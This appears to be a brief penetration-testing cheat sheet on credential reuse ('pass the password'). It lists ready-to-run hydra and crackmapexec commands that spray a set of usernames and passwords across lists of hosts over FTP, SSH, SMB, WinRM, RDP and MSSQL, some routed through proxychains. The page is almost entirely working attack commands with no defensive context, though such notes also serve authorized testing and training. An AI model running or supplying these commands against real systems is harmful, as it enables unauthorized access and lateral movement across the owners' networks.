Skip to content

Pass the password

  • we have user with valid password
  • we want to check if the same user and password can be use enywhere else

Tools


ftp

hydra -L user.txt -P pass.txt -M ip.txt ftp -I
proxychains -q hydra -L user.txt -P pass.txt -M ipp.txt ftp -I
ssh
crackmapexec ssh ip.txt -u user.txt -p pass.txt --continue-on-success
proxychains -q crackmapexec ssh ipp.txt -u user.txt -p pass.txt --continue-on-success
smb
crackmapexec smb ip.txt -u user.txt -p pass.txt --shares --continue-on-success
winrm
crackmapexec winrm ip.txt -u user.txt -p pass.txt --continue-on-success
rdp
crackmapexec rdp ip.txt -u user.txt -p pass.txt
mssql
crackmapexec mssql ip.txt -u user.txt -p pass.txt --continue-on-success